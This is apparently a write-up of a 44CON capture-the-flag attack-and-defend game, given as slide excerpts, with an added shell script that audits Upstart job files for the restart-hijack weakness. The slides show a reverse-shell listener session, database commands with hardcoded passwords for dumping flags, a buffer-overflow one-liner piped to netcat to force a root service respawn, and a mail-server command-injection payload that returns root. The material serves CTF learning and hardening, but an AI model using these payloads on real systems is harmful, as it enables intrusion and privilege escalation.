The document summarizes the author's experience playing a capture the flag (CTF) competition called the 44Con CTF. It describes recon activities like scanning services to identify vulnerabilities. Several services are found to have exploitable issues, including a pastie service with SQL injection, a mail server with remote code execution, and an authentication service with a stack buffer overflow. The author is able to exploit these issues to steal flags, gain a remote shell, and eventually escalate privileges to root through service restart hijacking and a mail service vulnerability. Overall it provides a play-by-play of the reconnaissance and exploitation steps taken during the CTF.
7. 44CON CTF - What we got
Virtual Machine image
IP Address
Scope of "attackable" machines
8. Attack & Defend
Kind of like a pentest
(maybe, I've never done a pentest)
I have a plan:
Recon
Harden
Write exploits
Run riot
Get the girl
Save the world
9. Step 1 - Recon
I'd rather be offline than owned
Self-recon
Capture traffic
Quick nmap of non-player servers
12. Recon - Scoring
Regular "scoring rounds"
Score server stores new keys in services
Score server checks for previous keys?
Every 30 minutes
Not great if you're trying to see talks!
50. Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*] accepted
$ whoami
contestant
$ pwd
/services/servicemon
Now we can have some fun!
52. Steal all the keys
mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"
mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;"
OUTPUT=$(redis-cli -r 1 keys '*' | tail -n 1)
redis-cli -r 1 lrange $OUTPUT 0 1
53. Leave a calling card
echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
57. Escalation - the hard way
$ find /etc -writable
/etc/init/mail.conf
/etc/init/auth.conf
58. Escalation - the hard way
USER PID TTY STAT COMMAND
root 8680 ? Ss /services/auth/auth
59. Escalation - the hard way
Next time auth respawns we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*] accepted
# whoami
root
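The "Harden" step from the plan, as an added audit script (not from the talk or the CTF image): it finds the two conditions the hard-way escalation relies on, Upstart job files under /etc/init that a non-root user can modify and jobs that respawn as root because they carry no `setuid` stanza. It assumes a find that supports `-perm -mode` and Upstart 1.4 or later, where `setuid` is a valid stanza.

```shell
#!/bin/sh
# Audit an Upstart job directory (normally /etc/init) for the restart-hijack
# pattern: a writable job file plus a job that is respawned as root.
# Assumptions: GNU/BSD find with -perm -mode, Upstart >= 1.4 (setuid stanza).

# Print every *.conf under $1 that is group- or world-writable.
# Anyone who can edit such a file controls the command run on the next respawn.
writable_jobs() {
    find "$1" -name '*.conf' \( -perm -0020 -o -perm -0002 \) | sort
}

# Print every *.conf under $1 that has an exec/script stanza but no
# setuid stanza, i.e. the service runs as root when (re)started.
root_jobs() {
    for f in "$1"/*.conf; do
        [ -f "$f" ] || continue
        if grep -Eq '^[[:space:]]*(exec|script)' "$f" &&
           ! grep -Eq '^[[:space:]]*setuid[[:space:]]' "$f"; then
            echo "$f"
        fi
    done
}

# Remediate the write-bit problem: 0644 on each writable job file, reporting
# what changed. Ownership should also be root:root; chown needs root itself.
harden_jobs() {
    writable_jobs "$1" | while read -r f; do
        chmod 0644 "$f" && echo "fixed $f"
    done
}

# Usage on a live box:  . ./audit_init.sh; writable_jobs /etc/init; root_jobs /etc/init
```

`root_jobs` lists candidates for adding `setuid <serviceuser>`; the page's auth job, which runs as root, is exactly what it would flag.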
60. Escalation - the easy way
220 Mail Service ready (33147)
HELO
250 Requested mail action okay, completed
EXPN respond(client, `whoami`)
root